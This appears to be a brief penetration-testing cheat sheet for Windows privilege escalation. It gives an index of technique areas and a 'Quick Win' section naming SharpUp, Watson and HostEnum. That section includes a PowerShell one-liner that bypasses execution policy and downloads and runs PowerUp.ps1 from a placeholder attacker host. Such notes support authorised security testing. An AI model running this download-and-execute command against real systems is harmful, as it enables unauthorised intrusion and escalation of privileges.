Privilege escalation
Index
- Patches Detection
- Services and Processes
- Registry
- Schedules Tasks
- Startup Applications
- Password mining
- Impersonation / tokens
- Admin2System
- Exploits
- Privilege abuse
Quick Win
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"
SharpUp.exe
Watson.exe
. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport
Enumeration
https://cs.piosky.fr/enumeration/windows/